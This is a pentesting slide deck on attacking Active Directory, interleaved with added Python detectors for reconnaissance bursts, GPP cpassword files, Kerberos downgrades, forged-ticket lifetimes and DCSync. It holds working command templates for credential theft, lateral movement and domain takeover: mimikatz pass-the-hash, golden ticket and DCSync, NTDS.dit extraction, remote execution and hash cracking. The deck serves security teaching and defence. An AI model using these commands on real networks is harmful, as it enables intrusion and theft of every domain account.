  • 32. LOCAL RECONNAISSANCE
    Collect information about the network, processes and OS to find out what kind of machine we have succeeded in infecting.
    Command | Description
    net start | Lists started Windows services
    sc qc <SERVICE> | Gets the parameters of an individual service
    accesschk.exe -ucqv <SERVICE> | Determines the service's access control rules (accesschk.exe is part of the Microsoft Sysinternals suite)
    systeminfo > info_output.txt | Displays detailed configuration information about a computer and its operating system, including OS configuration, security information, product ID and hardware properties such as RAM, disk space and network cards
    schtasks /query /fo LIST /v | Lists the scheduled tasks: whether they are recurring, where each task can be found and its parameters, as well as, crucially, what permissions they run with
    dir, type, findstr | Browse and search for information in the local file system
  • 33. NETWORK RECONNAISSANCE
    Collect information about the network, processes and OS to find out what kind of machine we have succeeded in infecting.
    Command | Description
    ping | ☺
    echo %USERDOMAIN% | Domain name the host is joined to
    echo %logonserver% / set logonserver | Obtains the name of the Domain Controller the host used to authenticate
    net group /domain | Lists the existing groups in the domain
    net group <GROUP NAME> /domain | Lists the members of a group, e.g. “domain computers”, “domain controllers”, “domain admins”
    net localgroup administrators /domain | Gets the members of the built-in group “Administrators”
  • 34. NETWORK RECONNAISSANCE
    Collect information about the network, processes and OS to find out what kind of machine we have succeeded in infecting.
    Command | Description
    net user /domain | Lists all users within the current domain
    net user <ACCOUNT NAME> /domain | Obtains detailed information about a user given his username
    net view | Displays a list of domains, computers or resources shared by the specified computer. Used without parameters, net view displays a list of computers in your current domain
    net use | Access to shared resources
    net accounts /domain | Obtains the domain password policy
    nltest /domain_trusts | Maps trust relationships
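Each command in the four tables above is ordinary administration on its own; what gives an intrusion away is several of them running from one user session within minutes. The detector below is an added example, not code from the talk: it classifies constructed process-creation records against those commands and flags the burst, with the time window and category threshold as assumptions to be tuned per environment.

```python
"""Flag hosts where the discovery commands tabled above run as a burst."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Patterns derived from the command tables on the slides. "net" is written net1?
# because net.exe hands most subcommands to net1.exe, which is the image a
# process-creation log (Security 4688, Sysmon event 1) actually records.
RECON_PATTERNS = {
    "whoami": re.compile(r"\bwhoami(\.exe)?\b.*\s/all\b", re.I),
    "local_groups": re.compile(r"\bnet1?(\.exe)?\s+localgroup\b", re.I),
    "domain_groups": re.compile(r"\bnet1?(\.exe)?\s+group\b.*\s/domain\b", re.I),
    "domain_users": re.compile(r"\bnet1?(\.exe)?\s+user\b.*\s/domain\b", re.I),
    "password_policy": re.compile(r"\bnet1?(\.exe)?\s+accounts\b.*\s/domain\b", re.I),
    "net_view": re.compile(r"\bnet1?(\.exe)?\s+view\b", re.I),
    "trusts": re.compile(r"\bnltest(\.exe)?\b.*/domain_trusts\b", re.I),
    "systeminfo": re.compile(r"\bsysteminfo(\.exe)?\b", re.I),
    "tasklist": re.compile(r"\btasklist(\.exe)?\b", re.I),
    "netstat": re.compile(r"\bnetstat(\.exe)?\b.*-an\b", re.I),
    "sched_tasks": re.compile(r"\bschtasks(\.exe)?\b.*/query\b", re.I),
}

# Constructed process-creation records (not real telemetry), one per line:
# time|host|user|command line. WS07 shows the burst, the others show normal use.
SAMPLE_LOG = """\
2018-03-01T09:58:10|WS01|ROOTED\\alice|C:\\Windows\\System32\\net1.exe view
2018-03-01T10:02:00|WS07|ROOTED\\jdoe|whoami /all
2018-03-01T10:02:03|WS07|ROOTED\\jdoe|C:\\Windows\\System32\\net1.exe group "domain admins" /domain
2018-03-01T10:02:05|WS07|ROOTED\\jdoe|net1 user /domain
2018-03-01T10:02:09|WS07|ROOTED\\jdoe|nltest /domain_trusts
2018-03-01T10:02:15|WS07|ROOTED\\jdoe|net1 accounts /domain
2018-03-01T11:30:00|WS03|ROOTED\\helpdesk|systeminfo
2018-03-01T11:45:00|WS03|ROOTED\\helpdesk|tasklist /V
"""


def classify(command_line):
    """Return the discovery category a command line matches, or None."""
    for name, pattern in RECON_PATTERNS.items():
        if pattern.search(command_line):
            return name
    return None


def parse_log(text):
    """Parse the pipe-separated records into (time, host, user, command) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, user, cmd = line.split("|", 3)
        events.append((datetime.fromisoformat(ts), host, user, cmd))
    return events


def find_recon_bursts(events, window=timedelta(minutes=10), min_categories=4):
    """Return {(host, user): sorted categories} for every actor that ran at least
    min_categories distinct discovery commands inside one `window`. Both values
    are assumptions for the demo: a single command is not evidence of anything."""
    per_actor = defaultdict(list)
    for ts, host, user, cmd in events:
        category = classify(cmd)
        if category:
            per_actor[(host, user)].append((ts, category))
    bursts = {}
    for actor, hits in per_actor.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            categories = {c for t, c in hits[i:] if t - t0 <= window}
            if len(categories) >= min_categories:
                bursts[actor] = sorted(categories)
                break
    return bursts


if __name__ == "__main__":
    for (host, user), cats in find_recon_bursts(parse_log(SAMPLE_LOG)).items():
        print(f"{host}: {user} ran {len(cats)} discovery commands: {', '.join(cats)}")
```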
  • 37. COMMON ATTACKS & TECHNIQUES
    • Passwords in SYSVOL & Group Policy Preferences – 10%
    • Missing Patches: exploit MS14-068 on a DC missing the patch – 5%
    • Kerberos TGS Service Ticket Cracking (Kerberoast) – 20%
    • SMB Shares Mining – 75%
    • Credential Theft Shuffle (“Mimikatz dance”) – 60%
    Reference: https://adsecurity.org/?p=2362
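The first item, passwords in SYSVOL, is the one of the five that an administrator can audit directly: every domain user can read SYSVOL, and a Group Policy Preference that once set a password leaves a cpassword attribute in its XML, which later patches do not remove. The audit below is an added example, not code from the talk, run over a constructed SYSVOL tree (policy GUIDs, account names and cpassword values are made up); it reports where cpassword is present and decrypts nothing.

```python
"""Audit a SYSVOL tree for Group Policy Preference files that still carry cpassword."""
import os
import re
import shutil
import tempfile
import xml.etree.ElementTree as ET

# GPP XML files that can embed a password in a cpassword attribute.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
GUID_RE = re.compile(r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}")


def audit_gpp_tree(sysvol_root):
    """Return sorted (policy_guid, relative_path, element, account) tuples, one per
    element whose <Properties> has a non-empty cpassword. The value itself is
    never decrypted: its presence is the finding."""
    findings = []
    for dirpath, _, filenames in os.walk(sysvol_root):
        for fn in filenames:
            if fn not in GPP_FILES:
                continue
            path = os.path.join(dirpath, fn)
            try:
                root = ET.parse(path).getroot()
            except ET.ParseError:
                continue
            rel = os.path.relpath(path, sysvol_root).replace(os.sep, "/")
            m = GUID_RE.search(rel)
            guid = m.group(0) if m else "?"
            for elem in root.iter():
                props = elem.find("Properties")
                if props is None or not props.get("cpassword"):
                    continue
                # Which attribute names the account differs per preference type.
                account = (props.get("userName") or props.get("accountName")
                           or props.get("runAs") or elem.get("name") or "?")
                findings.append((guid, rel, elem.tag, account))
    return sorted(findings)


# Constructed GPP files. The cpassword strings are placeholders, not ciphertext.
GROUPS_WITH_PASSWORD = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="LocalAdmin" changed="2017-05-03 09:12:00">
    <Properties action="U" userName="LocalAdmin" cpassword="PLACEHOLDER-NOT-REAL-CIPHERTEXT" neverExpires="1"/>
  </User>
</Groups>
"""
GROUPS_RENAME_ONLY = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="Administrator" changed="2017-05-03 09:13:00">
    <Properties action="U" userName="Administrator" newName="LocalRoot"/>
  </User>
</Groups>
"""
TASK_WITH_PASSWORD = """<?xml version="1.0" encoding="utf-8"?>
<ScheduledTasks>
  <Task name="NightlyBackup">
    <Properties action="C" name="NightlyBackup" runAs="ROOTED\\svc_backup" cpassword="PLACEHOLDER-NOT-REAL-CIPHERTEXT"/>
  </Task>
</ScheduledTasks>
"""


def build_sample_sysvol():
    """Create a constructed SYSVOL-like tree in a temp dir (GUIDs are made up)
    and return its root path."""
    root = tempfile.mkdtemp(prefix="sysvol_demo_")
    policies = os.path.join(root, "rooted.con", "Policies")
    layout = {
        ("{DEADBEEF-0000-4000-8000-000000000001}", "Machine", "Groups", "Groups.xml"): GROUPS_WITH_PASSWORD,
        ("{DEADBEEF-0000-4000-8000-000000000001}", "Machine", "ScheduledTasks", "ScheduledTasks.xml"): TASK_WITH_PASSWORD,
        ("{DEADBEEF-0000-4000-8000-000000000002}", "User", "Groups", "Groups.xml"): GROUPS_RENAME_ONLY,
    }
    for (guid, scope, folder, fn), body in layout.items():
        d = os.path.join(policies, guid, scope, "Preferences", folder)
        os.makedirs(d, exist_ok=True)
        with open(os.path.join(d, fn), "w", encoding="utf-8") as f:
            f.write(body)
    return root


def run_demo():
    """Build the sample tree, audit it, clean up and return the findings."""
    root = build_sample_sysvol()
    try:
        return audit_gpp_tree(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for guid, rel, tag, account in run_demo():
        print(f"{guid}: {tag} '{account}' still has a cpassword in {rel}")
```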
  • 39. ciyinet 39 KERBEROAST Pentesting Active Directory 1. Client encrypts a timestamp with his/her hash/key 2. Client receives a TGT signed with the domain krbtgt account that proves they are who they say they are 3. The TGT is then used to request service tickets (TGS) for specific resources/services on the domain. 4. DC sends a TGS ticket encrypted using the hash of the account that is associated with that service (SPN) Attacker
  • 40. KERBEROAST
    • Offline brute force of the service account's password from service tickets (TGS)
    • No risk of detection
    • No account lockouts
    • Invoke-Kerberoast from PowerView (dev) to collect hashes
    • Focus on user accounts: they have shorter passwords
    • JohnTheRipper (magnumripper) to crack them
    References:
    https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
    https://github.com/magnumripper/JohnTheRipper
  • 41. SMB SHARES MINING
    • Usually very fruitful, but sometimes boring and time consuming
    • Enumerate shares in the environment and look for data with hardcoded creds (scripts, config files), backups, documentation…
    PowerView Find-DomainShare
      • Searches for computer shares on the domain. If -CheckShareAccess is passed, only shares the current user has read access to are returned.
    smbmap
      • Intended to simplify searching for potentially sensitive data across large networks
      • Enumerates samba share drives across an entire domain: lists drives, permissions, contents, upload/download functionality, file name auto-download pattern matching, etc.
    References:
    https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
    https://github.com/ShawnDEvans/smbmap
  • 43. CREDENTIAL THEFT SHUFFLE ("Mimikatz dance")
    • Escalating privileges on some machine
    • Extracting creds/hashes from memory
    • Derivative administrator
    • User hunting: moving laterally and repeating the attack until Domain Admin level is reached
    Reference: https://github.com/gentilkiwi/mimikatz
  • 45. USER HUNTING
    List local admins remotely
      • Get-localadmin (script)
      • Get-NetLocalGroup (PowerView)
    List active sessions remotely
      • PsLoggedon (Sysinternals)
      • Get-NetLoggedon (PowerView)
      • Get-NetSession (PowerView)
      • Tasklist
    References:
    https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
    https://docs.microsoft.com/en-us/sysinternals/
    https://gitlab.com/ciyinet/ciyinotes/blob/master/Microsoft%20Windows/readme.md
  • 47. USER HUNTING
    • Invoke-UserHunter (PowerView)
    • BloodHound
    Steps:
    1. Get groups and the members of each group
    2. List domain computers
    3. Obtain local admins for each computer
    4. List active sessions on each computer
    References:
    https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
    https://github.com/BloodHoundAD/BloodHound
  • 49. Creds dump + Privs escalation
  • 51. PASS-THE-HASH
    Protocol   Algorithm   Secret to use
    LM         DES-ECB     Hash LM
    NTLMv1     DES-ECB     Hash NT
    NTLMv2     HMAC-MD5    Hash NT
  • 53. OVERPASS-THE-HASH (PASS-THE-KEY)
    Protocol   Secret to use
    Kerberos   RC4 key = Hash NT
               AES128 key
               AES256 key
    Reference: http://blog.gentilkiwi.com/securite/mimikatz/overpass-the-hash
  • 54. (OVER)PASS-THE-HASH
    mimikatz.exe "privilege::debug" "sekurlsa::pth /domain:FQDN /user:USERNAME /ntlm:NT_HASH /run:PROGRAM"
  • 56. PASS-THE-TICKET
    • Inject Kerberos tickets
    • Tickets must be in Kerberos credential format (KRB_CRED): http://tools.ietf.org/html/rfc4120#section-5.8
    • The Kerberos module does not require any privilege; it uses the official Microsoft Kerberos API
    mimikatz.exe "kerberos::ptt FILENAME"
  • 57. GOLDEN TICKET
    TGT (encrypted with the KRBTGT hash):
      • Username
      • Group membership
      • …
  • 58. GOLDEN TICKET
    The KRBTGT hash can be used to generate an arbitrary TGT:
      • Made by the attacker, not the KDC
      • Anything can be pushed inside
    mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH /user:USERNAME /id:ID /groups:500,501,513,512,520,518,519 /ptt"
  • 60. DCSYNC
    • "Impersonates" a Domain Controller and requests account password data from the targeted Domain Controller
    • Replicates the user credentials via GetNCChanges (Directory Replication Service (DRS) Remote Protocol)
    • Special rights are required to run DCSync
    mimikatz.exe "lsadump::dcsync /dc:DC /domain:DOMAIN /user:USERNAME" exit
    mimikatz.exe "lsadump::dcsync /all /csv" exit
  • 62. DCSHADOW
    Registers new domain controllers to inject malicious AD objects and so create backdoors or any other kind of illegitimate access or right
    Reference: https://blog.alsid.eu/dcshadow-explained-4510f52fc19d
    "Hi guys! This is DCShadow!"
  • 63. PENTESTING ACTIVE DIRECTORY dir is boring, show me how to RCE
  • 64. REMOTE CODE EXECUTION
    AT
      at \\TARGET_HOST HH:MM EXECUTABLE
    Schtasks
      schtasks /create /tn TASK_NAME /tr EXECUTABLE /sc once /st 00:00 /S TARGET_HOST /RU System
      schtasks /run /tn TASK_NAME /S TARGET_HOST
    SC
      sc \\TARGET_HOST create SERVICE_NAME binpath= "EXECUTABLE"
      sc \\TARGET_HOST start SERVICE_NAME
  • 65. REMOTE CODE EXECUTION
    WMIC
      wmic /node:TARGET_HOST process call create "EXECUTABLE"
    WinRM
      Invoke-Command -ComputerName TARGET_HOST -ScriptBlock { COMMAND(S) }
    PsExec
      PsExec.exe \\TARGET_HOST -u USER PROCESS
  • 68. NTDS.DIT
    How to get hashes from it:
    1. Decrypt the Password Encryption Key (PEK). The PEK is encrypted using the bootkey
    2. First round of hash decryption with the PEK using RC4
    3. Second round of hash decryption with DES
  • 69. GRAB NTDS.DIT AND SYSTEM
    Volume Shadow Copy
      vssadmin create shadow /for=C:
    Ntdsutil
      ntdsutil "ac i ntds" "ifm" "create full c:\copy-ntds" quit quit
    Invoke-NinjaCopy
      Invoke-NinjaCopy -Path "C:\Windows\NTDS\ntds.dit" -LocalDestination "C:\ntds.dit"
      Invoke-NinjaCopy -Path "C:\Windows\System32\config\SYSTEM" -LocalDestination "C:\SYSTEM"
  • 72. CRACKING NT HASHES
    John the Ripper
      john FILE_HASHES --format=NT
    Hashcat & rockyou wordlist
      hashcat -a 0 -m 1000 --username FILE_HASHES /usr/share/wordlists/rockyou.txt --potfile-path OUTPUT_NT.pot
  • 75. PENTESTING ACTIVE DIRECTORY But how about the blue team? Microsoft ATA
  • 77. PASS-THE-HASH
    • Based on local Security events
    • Not captured by ATA by default
    • Force NTLM to be used
    • Overpass-the-hash: encryption downgrade is detected
    mimikatz.exe "privilege::debug" "sekurlsa::pth /domain:FQDN /user:USERNAME /ntlm:NT_HASH /aes128:AES128_key /aes256:AES256_key /run:PROGRAM" exit
  • 80. GOLDEN TICKET
    • Same as overpass-the-hash
    • Detection based on lifetime
    • Default ticket lifetime in AD is 10 hours
    mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH /aes128:AES128_key /aes256:AES256_key /startoffset:0 /endin:600 /renewmax:10080 /user:USERNAME /ptt"
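The two ATA checks the deck names, an encryption downgrade on ticket requests (slide 77) and a ticket lifetime beyond domain policy (slide 80), as an added detection example in Python; this is not code from the talk or from Microsoft ATA, and it runs over constructed records whose field names, accounts, addresses and times are assumptions rather than real event logs.

```python
from datetime import datetime, timedelta

# Kerberos encryption type numbers as logged in Windows 4768/4769 events.
RC4_HMAC = 0x17
AES128_CTS_HMAC_SHA1 = 0x11
AES256_CTS_HMAC_SHA1 = 0x12

# Default domain Kerberos policy: TGT lifetime 10 hours, renewal 7 days.
MAX_TICKET_LIFETIME = timedelta(hours=10)
MAX_RENEW_LIFETIME = timedelta(days=7)


def detect_encryption_downgrade(events, aes_accounts):
    """Flag TGT requests where an AES-enabled account was issued an RC4 ticket.

    An RC4 ticket for such an account means the requester only had the NT hash
    (overpass-the-hash with /ntlm alone); supplying AES keys evades this check.
    """
    return [
        (ev["user"], ev["client_ip"])
        for ev in events
        if ev["user"] in aes_accounts and ev["etype"] == RC4_HMAC
    ]


def detect_abnormal_lifetime(tickets):
    """Flag TGTs whose validity or renewal window exceeds the domain policy."""
    alerts = []
    for t in tickets:
        lifetime = t["endtime"] - t["starttime"]
        renew = t["renew_till"] - t["starttime"]
        if lifetime > MAX_TICKET_LIFETIME or renew > MAX_RENEW_LIFETIME:
            alerts.append((t["user"], lifetime, renew))
    return alerts


# Constructed sample data (hypothetical accounts, addresses and times).
T0 = datetime(2018, 3, 1, 9, 0)
AES_ACCOUNTS = {"alice", "svc_backup"}  # accounts that have AES keys set
SAMPLE_EVENTS = [
    {"user": "alice", "client_ip": "10.0.0.5", "etype": AES256_CTS_HMAC_SHA1},
    {"user": "svc_backup", "client_ip": "10.0.0.77", "etype": RC4_HMAC},  # downgrade
    {"user": "legacyapp", "client_ip": "10.0.0.9", "etype": RC4_HMAC},    # RC4-only account
]
SAMPLE_TICKETS = [
    {"user": "alice", "starttime": T0, "endtime": T0 + timedelta(hours=10),
     "renew_till": T0 + timedelta(days=7)},                    # within policy
    {"user": "forged", "starttime": T0, "endtime": T0 + timedelta(days=3650),
     "renew_till": T0 + timedelta(days=3650)},                 # far beyond policy
]
```

A forged ticket built with the lifetimes on slide 80 (600 minutes, 10080 minutes renewal) passes the lifetime check, which is exactly why the deck uses those values.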
  • 83. DCSYNC
    DRS traffic (DSGetNCChanges) from a non-DC to a DC system can be detected
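A host-side counterpart of that network detection, added here as an example in Python (not from the talk or from ATA): it walks Security event 4662 records, whose Properties field lists the control-access GUIDs a caller exercised on the domain object, and alerts when the DRS replication rights (the "special rights" DCSync needs) are used by anything other than a domain controller's machine account. It assumes auditing of the domain naming context is enabled so 4662 is written; the records and hostnames below are constructed.

```python
import re

# Control-access rights (extended-right GUIDs) that DRS replication needs.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET = "89e95b76-444d-4c62-991a-0facbeda640c"
REPLICATION_RIGHTS = {
    DS_REPLICATION_GET_CHANGES,
    DS_REPLICATION_GET_CHANGES_ALL,
    DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET,
}

# 4662 "Properties" lists the exercised rights as {GUID} tokens.
GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")


def is_dc_account(subject, dc_hostnames):
    """DC-to-DC replication is done by the DC's machine account, e.g. DC01$."""
    return subject.endswith("$") and subject[:-1].upper() in dc_hostnames


def detect_dcsync(events, dc_hostnames):
    """Return (subject, rights) for non-DC principals that used replication rights."""
    dc_hostnames = {h.upper() for h in dc_hostnames}
    alerts = []
    for ev in events:
        if ev["event_id"] != 4662:
            continue
        used = {g.lower() for g in GUID_RE.findall(ev["properties"])} & REPLICATION_RIGHTS
        if not used or is_dc_account(ev["subject"], dc_hostnames):
            continue
        alerts.append((ev["subject"], sorted(used)))
    return alerts


# Constructed sample records (hypothetical hosts and accounts).
DC_HOSTNAMES = ["DC01", "DC02"]
SAMPLE_EVENTS = [
    {"event_id": 4662, "subject": "DC02$",      # normal DC-to-DC replication
     "properties": "Control Access\n{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"event_id": 4662, "subject": "j.doe",      # user account pulling secrets
     "properties": "Control Access\n{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"event_id": 4662, "subject": "svc_app",    # unrelated property access
     "properties": "Read Property\n{bf967a86-0de6-11d0-a285-00aa003049e2}"},
    {"event_id": 4624, "subject": "j.doe", "properties": ""},  # not a 4662 record
]
```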
  • 86. Credential access
    • Plaintext creds
      • WDigest
      • SMB Mining
      • mimikittenz
      • LaZagne
      • WCMDump
    • Hash
      • Memory dump
      • …
  • 87. Impersonation
    • Run as
    • NTLM Relay
    • Pass-the-hash
    • Pass-the-ticket
    • Golden ticket
    Logon session / Access token: User SID, Group SIDs, Logon SID, Others …
  • 88. Remote code execution
    • PsExec
    • WinRM
    • AT
    • Schtasks
    • WMIC
    • SC
  • 89. Domain dominance
    • DCSync
    • DCShadow
    • Golden ticket
    • SMB Mining
  • 91. Credential dump and persistence
    • NTDS.dit
      • Volume Shadow Copy
      • Ntdsutil
      • Invoke-NinjaCopy
      • DSInternals
      • Impacket Secretsdump
      • Crack hashes
    • Persistence
      • Golden ticket
      • Skeleton key
      • ACL-based backdoors
      • Malicious SSP
      • Password filters
      • …
  • 93. BUSINESS RISK
    Compromise of just one Domain Admin account in the Active Directory exposes the entire organization to risk. The attacker would have unrestricted access to all resources managed by the domain: all users, servers, workstations and data. Moreover, the attacker could instantly establish persistence in the Active Directory environment, which is difficult to notice and cannot be efficiently remediated with guarantees.
    "Once domain admin, always domain admin"
  • 94. ACKNOWLEDGMENT & REFERENCES
    • Miroslav Sotak and TVM team
    • FWHIBBIT
    • RootedCON and any other Sec Community in Spain
  • 95. ciyinetPentesting Active Directory 95 PENTESTING ACTIVE DIRECTORY